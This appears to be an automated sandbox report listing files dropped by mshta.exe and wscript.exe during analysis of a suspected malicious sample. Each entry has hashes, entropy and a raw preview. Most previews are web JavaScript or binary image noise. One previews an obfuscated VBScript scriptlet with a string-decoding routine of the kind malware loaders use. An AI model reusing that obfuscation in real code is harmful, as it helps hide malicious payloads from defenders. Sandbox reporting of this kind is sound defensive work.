                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5901],{40848:(e,t,o)=>{o.d(t,{Q:()=>A});var n,r=o(20011),i=o(8821),a=o(85169),d=o(93173),l=o(82248),s=o(46647),c=o(32735),u=o(12788),g=/^-?\d*\.?\d+(px|%)$/;function p(e,t){return Array.isArray(e)&&Array.isArray(t)&&e.length===t.length?e.some((function(o,n){return p(e[n],t[n])})):e!==t}var f=(n=Object.prototype).hasOwnProperty,v=n.toString;function h(e){return e&&f.call(e,"ref")}var w=new Map;function b(e){void 0===e&&(e={});for(var t,o=e.root||null,n=function(e){var t=(e?e.trim():"0px").split(/\s+/).map((function(e){if(!g.test(e))throw new Error("rootMargin must be a string literal containing pixels and/or percent values");return e})),o=t.shift(),n=t[0],r=void 0===n?o:n,i=t[1],a=void 0===i?o:i,d=t[2];return o+" "+r+" "+a+" "+(void 0===d?r:d)}(e.rootMargin),r=Array.isArray(e.threshold)?e.threshold:[null!=e.threshold?e.threshold:0],i=w.keys();t=i.next().value;){if(!(o!==t.root||n!==t.rootMargin||p(
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5939)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6033
                                                                                                                                                                                                                                    Entropy (8bit):5.480942188804171
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:ndfmCzL5yEifbddhECXsfLW1UJeFyB75iJWn/hEV/me1ksrfF7BoQQGkbq7a:ndfmCzL5tiTddWCXsfLW1UEoB3EVM0f2
                                                                                                                                                                                                                                    MD5:9F0E2F23F8E77696032795CBECCDC012
                                                                                                                                                                                                                                    SHA1:E6A4D1FCED1C4599B0AC3699EF5342239A63B786
                                                                                                                                                                                                                                    SHA-256:7B0D5B9C0CB2A660345E621A21628D357EACE9B13D37B6606235A81422381FCC
                                                                                                                                                                                                                                    SHA-512:9894E933F10CCC9509485F23CD0581151717233A08EBEE8CB6000299B265F4D759532A26E05AF26D94CDAC303DB001559E91C29E48405EBD2DA2ECEB118C5DBE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[2205],{3337:(r,t,a)=>{a.r(t),a.d(t,{acomTheme:()=>x,default:()=>p});var l=a(20011),i=a(37755),e=a(32735),o=a(22538),d=a(89504),s=a(21277),F=a.n(s),g=a(56875),h=a(38664),C=e.createElement,x=(0,i.Z)((0,i.Z)((0,i.Z)({},h.O9),h.Dx),{},{mainColors:h.nA,supportColors:h.eP,baselineColors:h.KR,systemColors:h.EU,complementaryColors:h.Ej,ameColors:h.Yj,typography:h.cp,fontFamily:"Helvetica,Arial,sans-serif;",shadow:{floatBasket:"0 0 12px 0 rgba(0,0,0,0.25)",box:"0 6px 20px -1px rgba(0,0,0,0.08);"},border:"1px solid #CCCCCC"});const p=(0,o.EN)((function(r){var t,a=function(r){var t,a=(0,d.useQuery)(F(),{variables:{path:null===r||void 0===r?void 0:r.pathname},fetchPolicy:"cache-only"}).data,l="texto claro"===(null===a||void 0===a||null===(t=a.skin)||void 0===t?void 0:t.textLight)?"#fff":null;return(0,i.Z)((0,i.Z)({},null===a||void 0===a?void 0:a.skin),{},{fontColor:l})}(null===(t=r.history)||void 0===t?void 0
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1501)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1591
                                                                                                                                                                                                                                    Entropy (8bit):5.586539109428292
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:c2nRFsRXtVDj8yAyIKWpmFbi6tzeMdeL5TNIFnFEZAMY8FHmnWoVBjVZ+VJrcrY2:/sDxD1ZcMdeLNNIFn5MYUGVVBjVIVJrw
                                                                                                                                                                                                                                    MD5:616A4B04A8AF6EAD79163CDEC1057F69
                                                                                                                                                                                                                                    SHA1:56FF9FFC261E7A6B3C32D10F941A90304CADA1DB
                                                                                                                                                                                                                                    SHA-256:0E41983F2EC1B2441DE0FDF56337B7BF91F0F18B4A7E3A07FAD638CA6FA484E4
                                                                                                                                                                                                                                    SHA-512:41D6B910438705CB934E386AFA9E0B5C7DC8E85BFC18A9F57A2FC47CBA91FCCF07D4F54B85931F48CEB6D74CB8E6858B661A9725650941D78D5C0C250ADC3379
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[1580],{78565:(t,e,i)=>{i.r(e),i.d(e,{default:()=>n});const n=i(24635).default},24635:(t,e,i)=>{i.r(e),i.d(e,{default:()=>c});var n=i(32735),o=i(56875),l=n.createElement,h=o.ZP.div.withConfig({displayName:"src__Wrapper",componentId:"sc-10z0zf3-0"})(["h1,h2,h3{","}"],(function(t){var e=t.theme,i=t.colorText;return(0,o.iv)(["margin-bottom:10px;text-transform:",";font-weight:bold;color:",";"],e.titleTransform,i||e.bgColor||e.grey.dark)})),s=o.ZP.h1.withConfig({displayName:"src__Title",componentId:"sc-10z0zf3-1"})(["font-size:22px;line-height:30px;@media (min-width:680px){font-size:28px;line-height:40px;}"]),d=o.ZP.h2.withConfig({displayName:"src__SessionTitle",componentId:"sc-10z0zf3-2"})(["font-size:18px;line-height:24px;@media (min-width:680px){font-size:26px;line-height:36px;}"]),r=o.ZP.h3.withConfig({displayName:"src__SubTitle",componentId:"sc-10z0zf3-3"})(["font-size:20px;line-height:24px;@media
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):342616
                                                                                                                                                                                                                                    Entropy (8bit):7.997289238267219
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:aV/b/zbZARUgDFTBSFSKHSohzjSa2XNzoHD6UOB9xS1m4AyaKn2QEyUYGT/ZB:aVTLbZWUgDFN0hHSa2XN4eUOTxS1j6KY
                                                                                                                                                                                                                                    MD5:09A9359538C4023FA1AA96FE9ADD37CF
                                                                                                                                                                                                                                    SHA1:140F70F523A32250E739B9911A6C0521D0B70E88
                                                                                                                                                                                                                                    SHA-256:6CC5E70BA885C9E30D21E0FA642917E8D69B4C8E2DDD65D477AC9E0033F6859B
                                                                                                                                                                                                                                    SHA-512:52C35173E3C10E79FC48314D894372E658AC04884721A219ACE472F00F464EC71C8FD0AFD336AEB9F1EE84F57487E56BE8707BCCA0EDDDD30EE7EDADA547B056
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx...-Ir....:.t..}.....|.D.,....0l..?.?.?.!.....Y.!..lB".drIq.....>.ow.GUf.C.#2+.N..}.,..@..GfdddfDdTd$....!.."..=..`..`.d.1.j.0..,....@.@..J..'bU..?....s.5..$.'..g....j..}Y...,...M...=64.7]SC@.4+.5."...n.p[......1`..Y.x...}..U.C...`q.A...r..........H[......cy..`'..g..fy.....C... ...X..X."4KB{.`.N.wm.{..]2.cP._.H_....NZ.._k.-..a.G.z.|.5.Y....c....;.m.5..cE...1.{S.7R>&...M.X<4@..+....@......N...L.j..8..M.4_o..Xp...87.r......x$fq..9.Mdv."..8...9.........V2...8.3c@.>...91~...V.zy....2.......7R.....!..ja...........;...|..;.:......9.-.[.6.hE.}.l..s..U.1..`.<.L.;._Jy5.t&.`I......p.p.w......].[._p.n<E.l.p<^G...z.?~..Q......F.=...i6..... .."A.V........t.,...O.....4(L..1.....(.ME..l...j...yM......x...6.....}=.m..$.!y.C.8........... .X..rP.J'vj..H..1B...a_p.....JXu......b...9.*.G.........<.p.....y"..o.......T..8V..8..ox..h....s...a....2.Sz......V......w.^...&]F./.....JY..q....<...G?.#.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (3001), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):25166
                                                                                                                                                                                                                                    Entropy (8bit):5.907831335869963
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:WMsc5OuI2K9ZZ9gMthmSL4gEpDdGtas7lfvEi4:WMsrlbZ9t3oJMtc
                                                                                                                                                                                                                                    MD5:E7B1CF6D3099C378FBA17881F1A9F0CD
                                                                                                                                                                                                                                    SHA1:5923278B0A172D0ADD80647F5DBCB117DCDF9923
                                                                                                                                                                                                                                    SHA-256:6CD77060B1C89833F786615CA740E2803D21FBFEDDE8846C0C9F422AABB8573C
                                                                                                                                                                                                                                    SHA-512:73B1C25CDB0AA3A2FA1639B22C554820562B53DB74DD1F244EAC114A5B1FB16EC27A5F8B119DB08C4F251D8497883D394BFB2ECFE3B65C9C0058A07C219F03E1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function desL1VzlCe3_17(sJAVXJoK2R8qykDnkG_26, uuKlXY5MQ_1)..Dim bboRDk53ipYUM_27, CmcNkPkVcys05ru3_28..bboRDk53ipYUM_27 = asc(Mid(sJAVXJoK2R8qykDnkG_26,1,1)) - 65..sJAVXJoK2R8qykDnkG_26 = Mid(sJAVXJoK2R8qykDnkG_26,2,Len(sJAVXJoK2R8qykDnkG_26)-1)..Dim rmcq0mDP84MS7vEQlTqh_29..Dim TuFmIUVG87ToSI26_30..CmcNkPkVcys05ru3_28 = "".. while (Len(sJAVXJoK2R8qykDnkG_26) > 0).. tCOMHrlIFS_80 = Mid(sJAVXJoK2R8qykDnkG_26,1,1) .. rmcq0mDP84MS7vEQlTqh_29 = (asc(tCOMHrlIFS_80)-65) .. TuFmIUVG87ToSI26_30 = (asc(Mid(sJAVXJoK2R8qykDnkG_26,2,1))-65).. CmcNkPkVcys05ru3_28 = CmcNkPkVcys05ru3_28 & (Chr(( (rmcq0mDP84MS7vEQlTqh_29) * 25 + TuFmIUVG87ToSI26_30 - bboRDk53ipYUM_27 - uuKlXY5MQ_1))) .. sJAVXJoK2R8qykDnkG_26 = Mid(sJAVXJoK2R8qykDnkG_26,3,Len(sJAVXJoK2R8qykDnkG_26)-2).... wEnd.. .. desL1VzlCe3_17 = CmcNkPkVcys05ru3_28..end function........const uuKlXY5MQ_1 = 92.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1296 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):10907
                                                                                                                                                                                                                                    Entropy (8bit):7.935173541531513
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:FSAj+8mpMrmPke8jIYJFIL7eGVcrEXdHAzypAvcYTvWy+r8u6i3rY:kROmHy7DIL7evetAEYTvB+r8e3M
                                                                                                                                                                                                                                    MD5:5C15B404F306E96E2023FF22B0533758
                                                                                                                                                                                                                                    SHA1:A62C74E2015E6D72281F744067DCA1A3942A21F0
                                                                                                                                                                                                                                    SHA-256:B05DCE878DAC18693B76C83B5F7A154F9C3B9D5D3279B7C0DDADBF76D2F56EEE
                                                                                                                                                                                                                                    SHA-512:C6995037208480BFC3E645156935676870DCF346B491DBA333E7C96CCD648E1ED085D483FCDA9AAD49E29F7EEE73E03FB6C8FE4A301D72AF4960A4BFF38198A0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......6......Q......pHYs............... .IDATx..ml[W.....4#&...Zk..e..(..h(@#...h..t.."2...<h.....2......-".i.;V..B16...2.(:...5.t.Q......J+...2t."y...\.s_.&J.......s.y?...}^4].u.B.!..B.!..B....- ..B.!..B.!.|y....B.!..B.!........B.!..B.!..W.@$..B.!..B.!..B."!..B.!..B.!..*..!..B.!..B.!.P.H.!..B.!..B.q..DB.!..B.!..B.+T .B.!..B.!..B\....B.!..B.!........B.!..B.!..W.@$..B.!..B.!..B."!..B.!..B.!..*..!..B.!..B.!.P.H.!..B.!..B.q... ../....PN.0........5..m.t.=..y.....w...n.W.Jf...*<.W....o.......AOO.N.:...?|...l.}}}......ggg.....D....~..T2s.......{.|......y...z..........6%....naS.VQ...t3..v*.y...]....'..u........6.5T>........E#;."B.v...S..y.B....P( ...H........'.K..{(_...x.w?J.l..![.....M...+..Jf...W.....Z.t.....wI...P.Z0....!.E%3..tF....W._..[..J.ya.^*.....\..b.{..r../..\MY./.B_z...7.sB..0."!dK(.}o.....t,i..s;....<...J.....hI.......0,1<._.....u..........N7..R.s.@...b.......B."!dK.sy.....B..P...*@.H..!.....Q...E.!.....t..A...t..F|........o t
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):13436
                                                                                                                                                                                                                                    Entropy (8bit):7.968304492096957
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:zgGUqL5yr7qJlbNzAjBorb3stbgqjqEggHMN3X1zPMlg5B:8GUqwrOJ9NMjGrb3qV2EgNNn5PG
                                                                                                                                                                                                                                    MD5:5D9F3BB3F4F63C6E7F0BC766B0BEFE4F
                                                                                                                                                                                                                                    SHA1:9E69111C3C65BAF526374F5CB57C153628CB4528
                                                                                                                                                                                                                                    SHA-256:E1CA1B64DC6BF286D0347A0BBD0D967BB92EB7647107936899BEE29DE202D58D
                                                                                                                                                                                                                                    SHA-512:26C582C01DA8C098AFA7869FA8235C5876ACD4D52045035780CC3560B59AFFF5F69A92E849660B7065D384BD3D8A80E3F6AFAF0622292FD853FCAF760D0D5406
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:RIFFt4..WEBPVP8X...........5..ALPH..........(m.....,...O..5..._..VP8 p3...u...*..6....%7p.X...........J.b.....mH.S...g...........>.+.7.?._....|..................;.......?....p..?......3...?.x.F.......A.........O..=............_......o..._...?.?..?....*...................~............?....._.g.?%.1.r.......~ {..3........}................................!.C...O..Q...'.......}......._......D.....O......_...?..........O..e.Q.....c.O....................w.............t.....?....._....c........G...g.G..z.'.6..6..6..6..6..6..6..6..6..6..6..6..6....6.....Jn.x.t.G...C..Q.?|....\b)n4.>.e?'...j!.$..g$T~).%.C...(..l...`.?.r7._.`T....<.\..o5....@j....jm........w.\#..{.;.iN.D&....1X.....j.-21....+..rQ...8^h.....h.Y....yY..7.[.4.....4.s..F.O\.r..T.O.&@..R..=d|.p.4......MW......m..m..m..m..m...>O...0.....>...v^.-.$....v..I..}...4U.c.^.^X.B...0.B..O....0.n....10...J...._.Pm._.v.La.....Y.`....>...k.\.............{.E..x...t...".=nC.O.D0d2.x..v...'.6..6..6..6..6..6
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):224845
                                                                                                                                                                                                                                    Entropy (8bit):7.994739990069494
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:amrlaGF4bFMzu5ID2kO2gCmZ3Am73ouj/1C:a2lRF4Szu5IDHc3Am73oGdC
                                                                                                                                                                                                                                    MD5:9478D604A860A7733917DC1539CDE3C5
                                                                                                                                                                                                                                    SHA1:E79769846947C43439A80E490C6861E9AC73CC19
                                                                                                                                                                                                                                    SHA-256:B904296E622551B280A830DF6F29909EA7A86621E23C711A9CD0FC23F9A75B83
                                                                                                                                                                                                                                    SHA-512:4334A97DE3A736EB542F78C1C3C9A1C2F9FD30B41D6806CC836C0E547A8404876E676492DD80411B278A90A1CA0A3B6476451E8979AE52A271D688753F775675
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..m.$Wy..{NfV.}...BH-@-lK.c..4~a#F-l....0l...a@....e^f......_v.`k....<....f$.7..].6f...a0......$...v.z.<g?...........q..2.y.sN..<....<...j..c....Fb..4&.=.OQ....E.Q.q>].-a..".'.I..b.:..ov.E.5}....l-.ef..5...td.....}.|../..#....u....z..2...j.}.....x..MO*.-.......6.T.YP9.....&.G.*y..1.o.Z..v.;?..U.<..r.Ds..&.,.=..JKYG...u..u.a2j=..g.E..v.FZ...W.G....fv?)s.H_,z=..Y.TiD.....J....j.z....#U.H.<..T..e....Ni..`...W.,Rp.$\.hJ..$....x..P.u..3I.E.k.>.u_Xc...+.|;...k..~P..U.o.e..e...F....E.y..].....$O/-~l..PD.<].......,.-"..O...~.....Pi'gU"...N..Y.}....pE.._D..Mf.\.$R..P..L.M<...Y.Kk.^.Ut..Zo..'..n....u*......k...@../[.S.Uy......YX......E.."y..{.z7-.nE.W.../e>.1...Qz..q...y(..U5....x.Ey..h...D1E...s..^.u\.y...t1S.$&k]...J....K}.q..x..$..F3+?....0.5.Z.tB..k........ZN.iQ..T..4V[E...=.^....{.*<...-V....I.<ON..YZ.*.&.U.me..Z.$L!..V+..:.o=6..:uov5.h.r.'.zS.i.....W........<{./k9.....
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 324, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):219607
                                                                                                                                                                                                                                    Entropy (8bit):7.995126654677858
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:3072:JQZzvI4lMRvJSGyQATDA0imIA1YY20evyJAnhtmMxpd9uyT87cyqR8PkocEhjcq:J6yvGQ0i+FAneM19HtRVEhjj
                                                                                                                                                                                                                                    MD5:BF072C6777FA104E9B1F7A54E7516B41
                                                                                                                                                                                                                                    SHA1:1AF2A3DF1A1E5CDF79264714BB6A99A7E46C8440
                                                                                                                                                                                                                                    SHA-256:7B52EAED3F13E8B73FC13F425A6F9D25B3C98650D88ED6D44B6A6F60438B7934
                                                                                                                                                                                                                                    SHA-512:F88CC4F15D0F72CB0081BABEADEE1043908F189FEC30283834713BBE8C7EE47E9006FD2F93AC0F2835CD23557E107C3D24CBFF1D2636798B742FFA974C55347E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......D.............pHYs............... .IDATx....Z....s.n.{.s...WYI&..T.E#.RBEIH...P.<....p......$$D..%.((A!T..YYYPM..9{..Fc{...#.bEcG8.....b........C.*........d.m....kU;..Xu.../...4..nk....6.....J.....n{..h^.>..S../...}....hz.V._.L..n.M..]..U..:..-...C.s.nw............;.........ek=.Y=T.M......r.ue....l*.....qs.~k.6..5..}......m....:.(...-..l.m%..~....y<.l.|L.{U1_.o"..V...#.F....u....X.8.OZ}.....p......Uv[.e..Z?.}.`..+...maW...e.).o.c.#.:t...:..C.v....q.....KM.|lq...x..hNm...3...6.rEX..M.u.y_..uG.Gjn...#...n...,sYM.3e.]..l.:J.e.s.mR.5a'.....*U.vu.)...sAS&{.....+.. ^&......F..^..6.$.Wo.8.>...2...;,d.O....;.P..stW.qp......j...M.r.v.......vj4.......l.3.*.Z...s..\=.....m.<....m".v]$l.i.R...u.(..<1w.m..{.z.XXm'.....eo..l{-.I.....|.C..S.U..~..b.an6'?wm..%t6.....2=u':t8#t.........O{...}p.u.....a[/...M........:~c.Q...N..|y....}...U[..Y.M.m:9.m.XE...K2M['d.a...v..[u......o............x..6..:..|L..F.ol.]p*.w......
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5854
                                                                                                                                                                                                                                    Entropy (8bit):7.901948181603355
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:RSjPX8+VKezzzLAREPNMNq4KJCdAg5zHXsoV7WHi2eRZ3nHh/SLBQ7zwRDJxMysl:RSjf8+VUisvECdvtWHiLfZSd+8no9V
                                                                                                                                                                                                                                    MD5:7E40D9EA5E05662F8CC9B805AA313AA9
                                                                                                                                                                                                                                    SHA1:CAC32FCA85437248C7B5F3FBB26A8E7BC5B56AB8
                                                                                                                                                                                                                                    SHA-256:F1DBC816B9FD576E3726CE5A10469D3760DD7328D63DA36D7F86E237A9A45EA9
                                                                                                                                                                                                                                    SHA-512:ECEDA18809D84D6E9CD672BD54885BE3A3D3805F07908D37C00A693EE3A383B8F44F739203ADCA39D830137FE88CB82D1D7AD7D953F2E134C40D0DAC412ACE4C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............).....pHYs.................IDATx...]l..a.....w..lZ...-Gn.a.I..Q......[..d ...J.".1.h......ABaQ.l...h+(..F.>.E.....".1).....N:.G.vw.p<."o.v.v.k.?@0.....3;;;.........................T..?L.0..H..-.LH .;...%[.'.... /j...m....it.*i...3...-!..L.a...D.....f.~S.=..I.k?..`..=,. -..l..7,....2.....2.r..M@...d.f.6..u&...@;&.q..&..k....|]....c.L..'..=.u.z..\N..Nt.y.ko........s.Dl...X..r.M.....1<......H......A.....Z..R..`.6....A@.]..x.;.=..... ...7"W..... ..6.1|F..~.HQ.D0.._;.-..9...p........1.D..+.5_./a....(..8...Wk.OMA_.4......$0Zk.....p..........#..x.6.).a..[hDu#...5.eP.....7......'..T".:{...z..w....bp..Kn7r.t_m..=...J...O;..U...d'.....U..8.y...Mv.&!.n..q.t_..<.t..!...X..d....FgmN.|....Q..FgmN....Ukt..D.K..eh...W5..8.K..(.......b.W.H.H.V$"..H.HVzG...|2.......Jo..t......Q.dq.B[.A_m.......O..J.w...l7"..#.-i..m.5..m~"j...v.U.F..m'j!..6.e..z}.%.Z..b...l.......aBs.t..v.V$.0T......3.57.l)..A...>'jA.5n.........S..........I..2.DmD..:.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):11023
                                                                                                                                                                                                                                    Entropy (8bit):7.958484350052868
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:RSHKdFU5BjAPP5ea9q4wgDsnKB+fVxfWT8igARItszv6s6v6v6v6nvJZ6mRzZeKE:4qdFmtAPmnKBAVxIhiXiiinxrwhuswE
                                                                                                                                                                                                                                    MD5:15192F94DB7354DA176CA9200FDD57AA
                                                                                                                                                                                                                                    SHA1:BA39A813EA8F7FD63100EAD2D1125423F4C6BC08
                                                                                                                                                                                                                                    SHA-256:F5D775A23BC44B23C2ABD28FAF1F5F0CBA4CCD4BC744F946BA094C386041B284
                                                                                                                                                                                                                                    SHA-512:1EF68A031CF0F92455EEDC034CD14450D6E4DC68C025B334CE62D9D8B81AEAD322BCCA4F9B8272BF70C4DFAAF18644D0FD80D0F2AF23F343A36E9C1C3ADB7FCA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............).....pHYs............... .IDATx..]l.W....H},.%./.";.....c.iK....S.....X.."50.....H..1.......t"..b7......D.`.^[T&A'......vv#.._DI..."..C.%V...*~.y~..........s.=. .. .. .. .. .. .. .. .. .. .r........=1.<..0...{8....A.........._.`!.!\...*v..QrB...^..>.....$f..D...0!@..5...@..A.....6Q....dp....&t.......:..-V=.".0.9..Vc.L..P`8<....8....b^..*...*.U......8Q..\....4..d....y.q..B(.....Y8.......... Rhf...........?..f........QF.w.K.~.-....H..a.f@......(<.B..."x..p#.S0`....a...t...c...L..P.kq..\..3....".0`.....QY.C"'...+.g=F_..a.9A.......w.-'+...y....!.._..:.{<.u$..'..0\..S....YKB........`p`..w[...d..#.H..Q@...A...1.=.B....f.#."'4..K.'.2..&....!."..x\|....z...N.Dqa..T.nX.?`..d..D...f...6.W.{.$t.(.8.X....P$..zt.....`..U..zuC=:...Q....3....D....=..L.e.:..rR#. ......J+...x.xrV%. ......7..i.....i.Q.0..p........m}....\.P.]...vw.+D.D.a.+...+.(....(9. x.........'...`.O.}.f....N.6...jVS...9%. ....W\.)h.}..w^kD.D^.A0.t..v..#..;........A.6.h..\S..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):42416
                                                                                                                                                                                                                                    Entropy (8bit):7.989150003310406
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:kfh0yapmFPej8Dx+THxWJdj2sdsBTFT/UX6B82/V8TmkR4eK:68EejDBTLdmQ
                                                                                                                                                                                                                                    MD5:2F17AD57ECBFC45AC503ED546B55D656
                                                                                                                                                                                                                                    SHA1:C1C907BF9F1B18E40C9BED81DBBE864C38ED2906
                                                                                                                                                                                                                                    SHA-256:CD22A7CB21E98FACF0FD0940A03687CE1EE26B02C5ED55AA4FA4ECF747C15070
                                                                                                                                                                                                                                    SHA-512:EDE5FABEBEC983E64C7B74511B5C512CC1D1EC6EA160E9CEA3285AEE5F439B084C160072E7CFCCE711281770C7F499E5351E61462825F3B2FB5906EC9FCD4593
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..y.e.]....}....UWWWU.....n$!..-1.V....c.l.,91.X,.0.q..B.b'`.8.....b.$...m$.0.!..ZBc.]U].{..;.../...s_.z.....[..3..o......<..V..o..Q8!..|.?.W.-.G0................s.<.....%......?..C.F(....*....w.C.=.y..Or........7......<......g;xI..$.............8..%...zT.o..5.'..s.=...@.K..K...&......=.=...t%........%,An.'.g..Or...t....b^>.@.G..{S.(.m.........6./u3..).....}.}..t@.3.EX|yA!U..#.z..../q...:.3(...)....@"..x.[t@.7..r......._....Oc.....X.`.4../uK..A........?f...R..^9t.e.2..E.)bU.uA........>.yZ;..'..W.+....5h..%..i..p....1....'..2..f...b...z..7.".*..A'3t2...~.4.|..,}...RP.....!Y[...?.7..C....?.ZqUZ.....mO..G......S.....{..>q..v@}JBpU-...F........7..'.;.....w..........,..G.]...<..96..Oh.}........}~..1.V..{-2(.{...wQ..u,....8q....:.R?...[^.i.s.=.c..OY.....E....v.......A..~..!..}.O...7....v.a..>....%f}.......6...4...cX..og.....,^..../ls.O.....9.. ............#Ob..F....gz.f....'Y.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):26631
                                                                                                                                                                                                                                    Entropy (8bit):7.975066122485574
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:yc1rfQTCwdemRYfKXhEWM1HoID94gYjm4SuD:yc5fQmwUmRYfihErHoS94+uD
                                                                                                                                                                                                                                    MD5:7AE99EEF395A8A7428DB4F7DDBD535B7
                                                                                                                                                                                                                                    SHA1:759AAAF5D3DC7F97BFB42A5C8A3CABBA78668F53
                                                                                                                                                                                                                                    SHA-256:DAE16355C9CA16107DCC1532BB5CEE820440248BF50374716A4E003A4E53461E
                                                                                                                                                                                                                                    SHA-512:D327F781F1FF7EF5D0424518CB396CA48E4EA7AEF7FDE067E3830C854F629B4EEDD063EB7E3FF8D6EF89C9B2F954D78AEE6352C02F4966546BC4522DA67B4452
                                                                                                                                                                                                                                    Malicious:false
